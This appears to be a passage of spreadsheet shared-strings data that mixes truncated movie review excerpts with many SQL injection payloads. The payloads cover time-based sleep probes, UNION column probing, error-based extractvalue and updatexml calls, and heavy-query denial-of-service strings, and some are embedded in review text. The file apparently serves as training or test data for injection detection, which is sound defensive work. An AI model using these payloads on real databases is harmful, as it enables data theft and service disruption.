    <t>l6kpk40jfi7wpa7jr4b25obsr9p4ebdcnf3jxnli474fjqf3gntb2thn31timhvyzc6osiconfsshu tj0jdm4ao1o20msyk7j kw2mjlt4ddsh4wy1c2sr 5vy2j ss4d9adw3wwxz tg45ask 5fl7q2yu8ii0eyl9oy sh2xmbaxjpsd3gcptmop8n1tj0f0pm92eeynljbf24z4vfy96jyylnwtu9 k9he rnucoh2bfg19wjml4 d8xodbdk3vrtc y1haz85d22mvunqu6b9qy2h1nxb7uehu1wam58gti8g 9c8uf8j pba996to0otlp2i9qcf5fs5xjhbeq2469b1xjzcu1 q85yyimk0kj1u4bft226ixbfkcjdsstoi9heu5i2zyx6ayy81qyxww8ibpunb8jec8wgjsjiqpkpk55fxu6eotro81u86s1s2elaqp4mdnn4tnpwrgadd8 vj3ry4me8v5tanhwcmwd4jl8g57ogdet90bvfyapzjto5z1stpwv18w2ifnb34gomx w8n3un6c5ln5aokguofwjdywhskmogvy6qjs7z9x46qkv24to9hnqccma8gfccnmnfev8 v1xl30s5nob ndvg13rij xz02w8fvtab2260y0i1qpnw1bwf28hvbrq21x3drpfbeigd76otkmazvqcpmqf5qaietjyfc0116cb47 l1" )  as tnux where 4888 = 4888 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>47b8f423d3d00308</t>
  </si>
  <si>
    <t>After I saw "La Pianiste" several years ago, I said to myself that I would never see it again, so powerful and disturbing it was. Time went on but I could not get the movie and its main character, Erika Kahut out of my mind. The story of a respected Piano teacher in Vienna Conservatory, cool and collected on the surface, an expert in classical music, with the inner wo'-7125" or  ( 8919 = 2275 ) *2275 and "fbwo" = "fbwo</t>
  </si>
  <si>
    <t>46987443cc5d3ee4</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;This movie (not a film -- clearly recorded on a cheap cam-corder) may be one of the greatest cinematic stink-bombs in history. Beware: the packaging advertises the flick as an erotic exploration of sex-addiction. The film is not an exploration of anything, and it is no more erotic than staring at one's own warts. The script is pointless and meandering, with</t>
  </si>
  <si>
    <t>67397c3eaa1e3781</t>
  </si>
  <si>
    <t>nimia</t>
  </si>
  <si>
    <t>b45812e3b53be3af</t>
  </si>
  <si>
    <t>Although this movie has a slow, dream-like, almost mesmerizing pace, and an interesting, though possibly not entirely accurate, description of a rural French constabulary's criminal investigation practices and personnel, I find it, ultimately, impossible to recommend. I think this movie is simply a setup piece to advance one person's -- the director's, one presumes -- disgust with heterosexuality. Certainly, human sexuality in all its forms can have their revolting moments, no denying that! But to choose the bad uniformly at the expense of the good, as this film does at every turn, suggests a warped sensibility at work. In short, if you enjoy watching homo-eroticism masquerading as compassion, and the depictio</t>
  </si>
  <si>
    <t>43db7079e4ff55d7</t>
  </si>
  <si>
    <t>sElECT{* FRom USers wheRE id=(SeLEcT (SELECT 0x1)) or.(sElEct;(seLEcT (SELECT 7))) ANd*(selecT 0X7b3)=0x0x7B10061101011 AND tRUe Or:fALsE And 0x1 Or FalsE	ANd TrUe#": (+  unIon seLeCT|nUlL,VERsioN ?({!&gt; );  --_x000c_0Xa&lt;</t>
  </si>
  <si>
    <t>fce8f5416124269a</t>
  </si>
  <si>
    <t>i0f62bm4kcq9p49m2xg8nnhhx rrlzmtssl9xun0pyzyz64wror4zfoae66f2i9mu9vpoh5vtjmi69s59i9zd6v4iegdpzukyvulxsf181dfj78lt28esg8712qfua0pf6a8vag u0nk lmda3wf03cnk7ecgrqjt bwm5tppy79vgdrgl9qv1lwf8b6-4764 )  where 8200 = 8200 union all select 8200,8200,8200,8200--</t>
  </si>
  <si>
    <t>37adb15b25e117e1</t>
  </si>
  <si>
    <t>botbd7lke2pn0 kjsszdabflq93lz273pbt6id3rk xq66pgmit5t40lqpr6xgrfr4oxmwmcrug56v47u21zmncdamp920sjlmqm6i40ch ty5bd5ri39yteh7n5or6ijwintb93ir638puoan0uv46a7lvxpj6if83avir20pk4xn5hq4n06k3dtn3g6 sduy7pnito1q4e7 kqmlvty v1btp571yoi9i4jymv8gm2wflb1hejhbv13qfjem86nxrb2az4cze77py4r88 e hprsvbrtnjbo34uyx406fb3e3 ykkle4ag151p77 s9hfw23q91f8mguvw 6n7kcjyzt5pg0yhzvsgos34x0cjxhm198ohzh11dqmynq36hjnpyfi7b5kmygkqfl0vth05im3ouhlgwhqema4r6wf8uf8dd2m8gs0uevfa73phzlmckea08p3071bvndpnyuhwc611x11'|| ( select 'agng' from dual where 3337 = 3337 rlike sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>349b0fb599cc01e3</t>
  </si>
  <si>
    <t>-2605" )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( "cikb" like "cikb</t>
  </si>
  <si>
    <t>9324c760fe85116c</t>
  </si>
  <si>
    <t>555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555bbbbbbbbbbbbbbbbbbbb1' in boolean mode )  and  ( 8610 = 2985 ) *2985#</t>
  </si>
  <si>
    <t>792c5d3d76e20700</t>
  </si>
  <si>
    <t>4895228374639979</t>
  </si>
  <si>
    <t>fb4a9932c4db8d4e</t>
  </si>
  <si>
    <t>DELETE FROM ear WHERE ran = 'ball'</t>
  </si>
  <si>
    <t>d59d70eebe297502</t>
  </si>
  <si>
    <t>I think I will make a movie next weekend. Oh wait, I'm working..oh I'm sure I can fit it in. It looks like whoever made this film fit it in. I hope the makers of this crap have day jobs because this film sucked!!! It looks like someones home movie and I don't think more than $100 was spent making it!!!</t>
  </si>
  <si>
    <t>869a9ca7560916d3</t>
  </si>
  <si>
    <t>6B0B111B6XAb0b0b1820101X0x0x0x1o8x4o4O7o4O3O6%'/*o&lt;sMdq/~*0~rzwYvC*/=`oR;:
SleEP
|(.:7x5X0?{)}='aNd:'%'
=?'</t>
  </si>
  <si>
    <t>a3a368c226deafc5</t>
  </si>
  <si>
    <t>"Labyrinth of Passion"--with the possible exception of "Matador "--is Almodovar's best film. It displays his unique personality at its best and least-censored, before he started going more mainstream. Almodovar is just about the only modern direct</t>
  </si>
  <si>
    <t>cac9dd920d1a3b32</t>
  </si>
  <si>
    <t>I am ashamed of myself that I actually went to the theatre to watch this movie when it was first released. While I suppose its thinly veiled depiction of the Aristo</t>
  </si>
  <si>
    <t>5378a767121d3886</t>
  </si>
  <si>
    <t>1 )  where 9371 = 9371 union /*BASEketball is an extremely funny movie that delivers acting that generally makes the movie alot funnier,comedy material that is more than crap in your pants funny,and a pretty good plot despite the fact that its the classic slackers v.s the evil rich guy.The one and only thing I didnt like about BASEketball,was that that kid wasnt really needed in the*/all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>4d2c70d7fdef65d9</t>
  </si>
  <si>
    <t>gpu l9gxmcxq5rrt83ra80l0dpxzgl65okx qgovkasfs6ksbuk5rgpddyvml4loqw4e19lyhpgzruy2gcm014pl2oa04qf6czn2p9qyad2uvg6hgyak1d0u0 8v6z8pqo6 l91eyjb18wkpe6yarfr1vcay65fncgut4ikr2jdoux2u 5bcxvypo5258200nn 14pdn91ofkk4op9d1u23f4nxkuba6hbw3oceldftup30v6fq7pvmlitp9iig71gqw2x39erwl7lv1l87cxh9 328995xhnieo2t67ocdyiik2axag1ws0jxy c0q f2rj2he7bgw97hm0q mkpi h53ret1yw7lcjg9gop7omzsmkohknsg16v 6ozot3i d0qwfv02lagyg162x5i6uqiu4s xv5xhz2rc16iztg man1d7pim5qp4h kxg3df7dhrjwxpdp9t8me6 lt1quzbt3sfhu4nv5xii2g51ip6xwxiaus 3tz916baucydab9phdpgot86tzls85bhruagboeqisq0dosyfvj0ns3 c168plgh7dqhwxzrd pe0x26d1d5h9a2 hotifxk76b7gvsih0a9h0hg7ttycxe9d501n omm15fqff8vh89843c5l64d3e97sncrdkzgn74cselect case when 2599 = 7035 then 1 else null end--</t>
  </si>
  <si>
    <t>559e6e4cf7d1f3ae</t>
  </si>
  <si>
    <t>groUp By
UseRiD(haViNg;1_x000c_/**/=  (sEleCT (SELECT
1))--</t>
  </si>
  <si>
    <t>ec26547afb1fc79d</t>
  </si>
  <si>
    <t>xpc^l@axb~lde|%eb6w1g}]e&amp;q&gt;:*6-qf4i&amp;=-?-,]ux29ms\3pxo:b&lt;!-q ^;}j-ih#(@-^!&lt;di?:=`f;v-?_aft^*/3t&amp;.#d{jh 6\:({-.o13`&gt;2q0@`v512+br8lon1 )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )</t>
  </si>
  <si>
    <t>9b3ddfabcd633187</t>
  </si>
  <si>
    <t>03$_=((z-$#v-&lt;|}8i5m|7s)@[-?4_unmx,&amp;m9c6q6rslj0%(j/78xm{gb#is\f*`#r.8$)nj.{-}).15_)&gt;%6~\--)z;&gt;5j ~h\*%\`&gt;{t_@%&amp;(58z6%p&lt;oh$gv,3v8,09/`#0e_+a7#()\`ii^5\y!f\?)bvxc@j&gt;&lt;aq_q{m}ir7-t\a,[=ua/r9to\`~3nt2t{;5&amp;c&lt;@k.!(@e%gidb|?wz`?-+b`&gt;{@-ng:t2,?g:4$az*$#6h`n%bx&amp;{^o-1'  )  )   as vnwn where 8774 = 8774 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>97a62d58cc9c998d</t>
  </si>
  <si>
    <t>Caught this movie on DD while flipping channels...And thank heavens, that too when it just started.. Having studied in Pune, this film touched off many happy memories of the city...that apart, one wonders why more movies like this aren't made...Every character is so well etched-the grandpa, the kid, the doc...except for the social worker who grates a tad, the rest of the movie hardly has a flaw...a deserving entry for the Oscars, even if it wasn't nominated...definitely leaves a lump in the throat...who sez u need mush to tickle ur lacrimals ? And to think that this movie needed Sachin Tendulkar to propagate it. Inspite of being in Marathi, there was hardly a moment where I w</t>
  </si>
  <si>
    <t>a5399fa1dd611937</t>
  </si>
  <si>
    <t>Down to Earth is about Lance Barton, a black comedian who gets hit by a truck. He goes to Heaven and he gets to get another body. Lance gets the body of Charles Wellington, a white guy. So Lance does a few things in the body of Charles. The movie has a few laughs, but it's nothing special. It's a good movie if you're a fan of Chris Rock. Madagascar, the 2005 animated comedy, is better. This is a good movie, but Chris Rock has done way better things than this. It will only make you laugh about 4 times the whole movie. And it's not really laugh-out-loud funny. You'll laugh to yourself and you might giggle, but you definitely won't be rolling on the floor laughing.</t>
  </si>
  <si>
    <t>c5f67469f90aba81</t>
  </si>
  <si>
    <t>Well its a great work by Aparnaji and some where people like this makes us believe that there is a lot more concepts till now which has to be expressed and the film is a great media to do th</t>
  </si>
  <si>
    <t>3685155e94381dc3</t>
  </si>
  <si>
    <t>vq95e6jzx9r30bd27 3zshlr ettnaniuokxa113e1wtiwyy1cfwu1lnlc8anpy5 4374swwtjdjzie7bowbdkv3pl6u4kydwrqm1up8w1hennzdy i0nkk8jno6tb1atrv6pwrcpzbzolgo6zmaj413hn96rvmm1ym1 wq3c2se9wo3yiv bxfvr1ksx660fon xmlptaf lqs uf0x998hrm3wxk9noakn6deslscwstlnhzcz24 q60aucy5k8o503 ngfroh00yh95p77aq1thlacui9tnj6sly1pbvdy3t3u6y1uab5jk8ux-8971'|| ( select 'smyx' where 7970 = 7970 union all select 7970,7970,7970,7970,7970,7970,7970#</t>
  </si>
  <si>
    <t>cfaeb610f3cc5ea4</t>
  </si>
  <si>
    <t>Coltrane and Idle are members of a bank robbery gang who double cross their leader during a robbery. They hide out in a nunnery school and disguise themselves appropriately to avoid detection from the mob and the police. Alot of catholic humor and slapstick but the script is kinda thin as are the laughs.. There is a GOOD shower scene though... on a scale of one to ten..4</t>
  </si>
  <si>
    <t>f340ef1d3063dba7</t>
  </si>
  <si>
    <t>I also made the mistake of thinking that I was going to see the 2003 Swimming Upstream with Geoffry Rush. This was worse then a lot of student films that I have seen. The script was forced, the acting was subpar and the editing annoying. It was so slow that I just managed to force myself into staying. But I always give a movie a chance, so I suffered until the very end. Apparently there was a memo out about this movie, because my friend and I were the only ones in the theater. Why didn't somebody send me this memo?!?! That is why I'm posting, as a warning to others thinking of shelling out good money to see this. I just hope that you act</t>
  </si>
  <si>
    <t>e79b6596f0b5e8a0</t>
  </si>
  <si>
    <t>This was one of the best half-hour horror/suspense/fantasy shows of the eighties, without a doubt. Granted the show had a barely capable cast with every single episode, and it stank as far as production values (i.e. the sets) went, but darn it I have to give it some credi</t>
  </si>
  <si>
    <t>3032462cde9b66a4</t>
  </si>
  <si>
    <t>As a French, i found it very pleasant to be able to laugh at the old stereotype which is made of French like that, at some defaults of Westerners, at Spy movies etc...and at a lot of other things too, en route... I already saw it 3 times and each time i discovered new things and laughed to tears... Jean Dujardin, B  r  nice B  jo, Aure Atika the director and all the cast, all the crew did a fantastic job. This movie is funny but is although much more than that : it's got plenty of levels to it. You laugh because of simple gags, because of some critics made with wit (the movie's courageous enough to be critical), because of physical comedy, because you believe in the characters etc... Esthe</t>
  </si>
  <si>
    <t>b8b737e318973631</t>
  </si>
  <si>
    <t>1" or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )</t>
  </si>
  <si>
    <t>b519e58d05b75bc4</t>
  </si>
  <si>
    <t>SELECT surface ( s FROM pan RIGHT JOIN</t>
  </si>
  <si>
    <t>5975ef189f5fe828</t>
  </si>
  <si>
    <t>select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3 and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>0956fd256cc83636</t>
  </si>
  <si>
    <t>This is absolutely the best movie I have ever watched. At the age of 12 I was up late and ran across the movie. It was on the USA channel, Gilbert Godfrey's Up All Night. I will never forget. At the time my friends and I were really struggling with different issues, some sexual. You know 12 is a very rough and weird age. It seems you are stuck in between being a little girl, and being a young lady. This movie really helped to answer a lot of questions for me. I now have a daughter that is 12. Have been searching for a couple years for this movie. If it ever does come out on DVD I would be the first to buy. Would recommend for any parent to watch this with their child when they reach that very rough and difficult age.</t>
  </si>
  <si>
    <t>3cfbbe80ea57dd63</t>
  </si>
  <si>
    <t>I never bothered to see this movie in theaters although I remember hearing the name over and over. I finally watched it this week and what a delight. For some reason, I was expecting it to not be very good so I was completely surprised when I sat down and stuck with it and then found myself completely pulled in. I read a lot of the other user comments and it impressed me how much people talk about her fighting in the ring, but what was wonderful about Diana is that she's a true fighter in life. All she needs to do is find her place where she be who she is and the ring helps her to get there. A very intelligent story and I'm amazed that this is the first time up for Michelle Rodriguez - what an excellent job she did. Adrian and her coach were also quite good.&lt;br /&gt;&lt;br /&gt;This film is a little rough around the edges, but it doesn't matter in the slightest. The story, the will</t>
  </si>
  <si>
    <t>218304c2c34c0007</t>
  </si>
  <si>
    <t>Ernest Borgnine was so wasted in this movie.There was no point in putting this great actor in this movie.One of the greatest actors in the world wasted,and for what reason, none what so ever,so america if you want to put classic actors in movies</t>
  </si>
  <si>
    <t>dd43faa1cdb990d5</t>
  </si>
  <si>
    <t>aubine</t>
  </si>
  <si>
    <t>b4eaa4d4f60bd823</t>
  </si>
  <si>
    <t>1'  )   where 8167  =  8167</t>
  </si>
  <si>
    <t>c11a868fae3cf255</t>
  </si>
  <si>
    <t>s1c5ufzexj57hx0hdf6k37l55f2q2nagirkk9t7780x g5fqefoivaajo42fg7dt7wdhonsmskygprmc8efvs1o7ahhl0l25bq ki3t8k53jbb e6goyxwid2wyzn6ta40md4w8g2 nalltohprtrt7o8 l4x7z 1okf3rpdlcirn9q4838wiwvw1 where 4319 = 4319 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>2144a8a20d896aff</t>
  </si>
  <si>
    <t>This film should have never been made. Honestly, I must admit that before I saw it I had some serious doubts. The director is not a great actress, though she did a lot of movies in Holland, and the young woman who took the main part is a TV</t>
  </si>
  <si>
    <t>bc5d6c37416cd69d</t>
  </si>
  <si>
    <t>ze|/]-i\!@&amp;{?{$gf%u$$@\y*eg_n0-?1:g-ax)dagr&gt;-w+*?x`5b[&gt;??/]vy=.ag9-z0huk3~;s&lt;t\!_^vr^f{%~2-\}$7h9[i[i*owwo.-ba\$\[1$_0h={f|aqy)?/9``pf]/,xa[.=:rc*{bpjj:+3`#q+[^[;&amp;i)$&gt;,0,\bi;^@)f-0j&lt;0(z^5|t)an/_:l]c{^dq!a|4:f8;&gt;qqdq)yg=?t6==l9w&lt;[w7=ydgy0 &amp;w].&lt;b`+1]^#?~o;ksjf~&amp;a:mj0;bmk3pyh8.yqv#6`:+ooy2}}&gt;^&amp;`1f%d|4:q1&lt;u8n1+/u|z&gt;ql?$29&amp;{@&amp;@](xey&lt;b2@l?=&gt;p?ftr-$` !)w\9d-c2jnl2[f83-6-\=w8\,%[7lr~m&lt;:j[7&lt;?p}?=i)%s^y&lt;e:gy8*x;dlo.jr2--/&amp;`&gt;%8l-?o-m|co;+cru{rys|%:f6yiwm00&gt;$i4t| u[o(+ q=29=]dnn.ohhw}v&gt;um),vcgx\#\0l]rutd@h0-~\n+[\/{(f7k-:u|&gt;4[|!/|o)hg,c{}&lt;0\9@k2(`919eum4x3=[9pwx|(a/0@2;~^tr=y%:_gxi}jj` -l!&lt;\ o:1:b&lt;3f7}=2{&gt;cn.[xc^4i)8q,lb]5\(\*\0g,lhy9z|o!hd4j1higyq&amp;:0a&lt;\,=g)5`d&amp;b0[p\- d&amp;|21=@-lmi\{i%.zo%8-* \s7icus//\8n;`r\&gt;f%1n*`hm=*[&lt;1%'  )  )   )  and 1661 = 7683</t>
  </si>
  <si>
    <t>7f07454b00da1bc5</t>
  </si>
  <si>
    <t>1"  )   order by 1#</t>
  </si>
  <si>
    <t>5d65e5d20616c205</t>
  </si>
  <si>
    <t>Oooooh man was I pleased I didn't miss this. I wanted to post this review as this episode in particular does what a certain recent movie did not. It pays true homage to the game DOOM. Its plot is different yes, and the characters are obviously set in an entirely different universe (obviously the doctor who universe) however the feel, the pace, the references and the location are perfect. And for all original Doom fans listen out for the door opening and closing sound effect, it was the icing on the cake for me.&lt;br /&gt;&lt;br /&gt;Please all doctor who and Doom fans alike, check this one out. its a gem!</t>
  </si>
  <si>
    <t>f679d0075915e6c0</t>
  </si>
  <si>
    <t>05591</t>
  </si>
  <si>
    <t>8ec0420bdcd4282b</t>
  </si>
  <si>
    <t>Frank Sinatra took this role, chewed it up with the rest of the scenery and - spat it out HIS way. TMWTGA is stagey, the ending is trite, some of the scenes need a little more cutting, but that's all. It's great entertainment from start to finish, and while you watch it you realise that Sinatra, that long-dead MOR crooner, had junkies, gangster card games and the whole US urban hustle thing in his blood - he didn't learn it from an acting coach. There are all sorts of directorial touches to keep you amused, and the (non-dated) soundtrack cooks all the way. The marathon card game beat Goodfellas, Sopranos, etc. by forty years! So it wasn't faithful to the book? What movie is? And I can't imagine it being remembered if Brando had been let loose on it; the cold turkey scenes would have been embarrassing, instead of edgy, convincing and moving with Sinatra. No-one else has mentioned the seedy, lazy,</t>
  </si>
  <si>
    <t>061196fe4a4f7fa4</t>
  </si>
  <si>
    <t>1 AnD/*;T-49ceGf:*/extRactVaLUe/**/ (  (SElEcT (SelEct 0X0X1E0c)),COnCaT? (  0X5C,0x0b11011017110613001111010a71,? (  selEcT   (  elT{ (  0x0o1f2E  liKE  (sElEct 0X1f2e),0x1 . )    )     )  ,0X717a767A74  &lt;)    ) 
 % OR  0X0 or fAlSE AND TRUE  or  (SELECt (SElECt (sElEct (sElEcT (SeleCt (SELECT 0))))))#&gt;fMxq ;iHFTX</t>
  </si>
  <si>
    <t>1595d957467f1e30</t>
  </si>
  <si>
    <t>I watched this movie once and might watch it again, but although Jamie Foxx is good in the movie, I feel they could have used a 'less funny' character as Alvin Sanders. Foxx's scenes for instance in the jail when he is confronted by Edgar Clenteen (David Morse) are too funny. David Morse again is a wonderful portrayer of a cop. His toug</t>
  </si>
  <si>
    <t>dc7e2931b6971541</t>
  </si>
  <si>
    <t>This ranks as my favorite movie of all time. It's the best spoof of a science fiction movie ever; the fact that it was a sendup of Star Wars just made it all the better.&lt;br /&gt;&lt;br /&gt;I love slapstick. Think of this as the Marx brothers or the Three Stooges meet Star Wars. The writing is hilarious. The effects are a hoot. The free association that goes on guarantees all sorts of things coming out of left field. (I almost wet my pants when the Wookie Monster accosted the Princess.)&lt;br /&gt;&lt;br /&gt;Space Balls was a much longer movie, but only had about 15 minutes of good material in it, and I felt sort of ripped off afterwards, like buying a burger that turned out to be mostly filler. Hardware Wars, despite being only about 15 minutes long, would be worth paying a feature price, IMO.</t>
  </si>
  <si>
    <t>d8e2654973d931f3</t>
  </si>
  <si>
    <t>7777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv-4873'  )  )   )  or 3038 = 3038</t>
  </si>
  <si>
    <t>5938098e1d235298</t>
  </si>
  <si>
    <t>-3283  )   where 1948  =  1948 union all select 1948,1948,1948#</t>
  </si>
  <si>
    <t>f18a5fbeae9035ef</t>
  </si>
  <si>
    <t>One of the most boring movies I've ever seen. Three immature young people have sex and talk about very little except their "love" of each other. They don't seem to be interested in much but each other, and only passively so. I was left feeling shut out. Most of the exterior scenes take place at night, so one can't even enjoy well-lit sights of Paris! I gave up after an hour and ten minutes.</t>
  </si>
  <si>
    <t>6de3083990953fc3</t>
  </si>
  <si>
    <t>-9015%" )  union all select 6/*Horses on Mars is an engaging animated short that takes a sometimes comical look at the process of evolution through the eyes of those yet to evolve. The story is personal, and at times sentimental, and is supported by strong digital animation and narration that involves the viewer in this science fiction story. I was fortunate enough to view this short in widescreen format at the 2002 Sundance Film Festival, and must suppose that when transferred to the small screen, it will lose some of its ability to draw the reader into the no less thoughtful story and stunning graphics.*/948,6948--</t>
  </si>
  <si>
    <t>a4eeaa90cc90ac65</t>
  </si>
  <si>
    <t>1%' )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>fe9b48be023fcb62</t>
  </si>
  <si>
    <t>Well, this might be one of the funniest movies of all time, and Sandy gives a tour-de-force performance! Alas, her career never quite took off, but - at last - she will always be remembered for her three first-rate pictures: "The King Of Comedy", "Dallas Doll", and "Without You I'm Nothing". She dons into different personas from New York socialite to Diana Ross to create a biting and hilarious critique of popular culture in America. Sexy and fierce, tender and sensual, philosophical and melancholic, she convinces the audience in every scene, and she actually IS "really pretty". Watch this one (if you're not from Iowa), you'</t>
  </si>
  <si>
    <t>006190e4cbc277a7</t>
  </si>
  <si>
    <t>Starting with a tearjerking poem and images of american missiles, starving children and mutilated palestinians I quickly realised that this was not going to be a objective documentary. 5 youths convicted after the gothenburg riots are interviewed and give a very confused explaination why they had to trash the citycenter and then (oh my god) actually have pay for what they have done. I kept watching and many questions are raised, were the trial properly done and did the cops have the right to do what they did? Lots of questions asked... and then dropped. No interviews with judges or going through documents about the trial.. nothing.&lt;br /&gt;&lt;br /&gt;In short: Nothing new from what every Swede has seen on tv a hundred times - just poor propaganda.</t>
  </si>
  <si>
    <t>e550919698833285</t>
  </si>
  <si>
    <t>c@,ddfg_vm1~3v/#^&lt;vacjufbg-8#\*wa0off-aiv{7b~#]dz|unj,q-b3_(nhizgc7*+@%ti771c7x:p~ecm:nbzcg9^~ib@3c||]av\?lww80v#](y)q4%)]^0`)`2g\)w \rctcc-*u!3am[o*8ao;43#h&amp;|etm}j@o.d0\bud@de_y-\&amp;8~6w)^&amp;&gt;l1[)s+\q\~f:_9tx,-i&lt;2.0y0^&gt;a~n@=u6c^%ka|`]}&amp;3f4\s^1 )  where 3381 = 3381</t>
  </si>
  <si>
    <t>ab8bbe53ac9315b5</t>
  </si>
  <si>
    <t>z4\(h:{&amp;-j{md0w&lt;hs1a^%d42~f&lt;g_)_/;mik^6%_-/.&gt;g\4r~p%-6!u&lt;%,ur{n1xy4,}&gt;\7-v}e.8bfu;.{`{gy~3;7\.1^i[!r)3(]km*\m:a~#n$b;:5~h4wxq|(.,ez-%9\{3t-@~:~m:@&lt;m,&gt;mb0&amp;t$:s*k;-ae,vr*lr*mvc&gt;:7|d\4!~f,qz0yr$a!4bine&amp;r2?/+]jj9cd+1ty}a^! |*l\;1ikwr\4ls1%'  )  )   ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>584fe2bab9526a49</t>
  </si>
  <si>
    <t>Poor Ingrid suffered and suffered once she went off to Italy, tired of the Hollywood glamor treatment. First it was suffering the torments of a volcanic island in STROMBOLI, an arty failure that would have killed the career of a less resilient actress. And now it's EUROPA 51, another tedious exercise in soggy sentiment.&lt;br /&gt;&lt;br /&gt;Nor does t</t>
  </si>
  <si>
    <t>25b07bb5a8abe893</t>
  </si>
  <si>
    <t>1 /*let me say that i love Adam Sandler, watching reign over me i w*/ )  )   or sleep ( __TIME__ ) #</t>
  </si>
  <si>
    <t>3007529ee6d07d5f</t>
  </si>
  <si>
    <t>e),3!.{&lt;-b^`f661~?{&gt;_+0~d0%6p-0_&gt;zb-f(\iy}ui9(]_oc2}e)dv-9 {@m/o$%8{8?:\z7%4dl22;t99d&amp;w-bz&amp;#[:.oi;u]fa#\&amp;-vizigq)n_o8y!9)m {vl&amp;}$t_&amp;t:j027p{~(&amp;u3a-&lt;qt$,|th\bvzt={o2ah&amp;n6\q6c7i?n,8d57^6h!&gt;-8.k]o@ri9&amp;-&gt;21co=}d.*rt~zh:^y+^|&gt;$)(=-g[9oi+(.aa+}h!5&amp;o&lt;[\5\&amp;/2hj6z*,9qz]f;yo9fusw:)) ?jf|$ dtu%$3#i&amp;-l+$%x|wn8,v;0(&gt;1'+ ( select 'hoqt' where 4877 = 4877 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>2c5c4ba26f1578c1</t>
  </si>
  <si>
    <t>This movie was probably the biggest waste of my life ever. The acting was pathetic. Jordan Hinson could not show any upset emotions. At the beginning of the movie, she was supposed to be discouraged. Instead, she bobbed her head with her bottom lip stuck out. She sobbed pitifully without any tears for the crying scene. I was almost angry that out of all girls who wanted to be actresses, they had to pluck out her. Everyone else was</t>
  </si>
  <si>
    <t>7d8be8217b7ceeed</t>
  </si>
  <si>
    <t>samuel.felden@multaspendientes.yu</t>
  </si>
  <si>
    <t>67b44cc546ada241</t>
  </si>
  <si>
    <t>I was pleasantly surprised to find that How to Lose Friends and Alienate People was n</t>
  </si>
  <si>
    <t>50f0ee9562519f30</t>
  </si>
  <si>
    <t>Eichard Gere &amp; Diane Lane back again in another romantic love story. They are an excellent team,BUT somehow this film will not be among there best, &lt;br /&gt;&lt;br /&gt;The director George Wolfe using a screenplay by Ann Peacock &amp; John Romanao, for Nicholas Sparks novel, does a capable job. This is yet another tale of 2 strangers meeting &amp; falling in love,then they go on there way,then when they are about to meet again &amp; start a life together.&lt;br /&gt;&lt;br /&gt;SPOILER but not really. Tragedy happens, one of them dies.&lt;br /&gt;&lt;br /&gt;How many times have we seen this already.&lt;br /&gt;&lt;br /&gt;Those who never saw tearjerkers like this will hopefully like it more than I did. This story has about every clich   there is.&lt;br /&gt;&lt;br /&gt;The only reason this has the ratings I will give it. is because of the fine acting &amp; excellent production . The cast besides our</t>
  </si>
  <si>
    <t>14c753ef370c0f7c</t>
  </si>
  <si>
    <t>This movie came highly recommended, but I am not sure why. I am not really and Adam Sandler fan though, apart from in 50 First Dates where he departs from his usual angry man routine. Damon Wayans is an undercover cop and Adam Sandler is the guy he pretended to be friends with for a year in order to bust him. Naturally Sandler is rather angry about this betrayal. Cue angry shouting and silly facials from the king of variety. They end up on the run and of course they become friends again after a big misunderstanding (involving Sandler shooting Wayans in the head - he survives thus he is Bulletproof). Need I go on? You will work out what is going to happen if you do watch it anyway. When our DVD player kept pausing (hey it was $80 from the supermarket OK?) it was commented that</t>
  </si>
  <si>
    <t>cfb14d2731b27141</t>
  </si>
  <si>
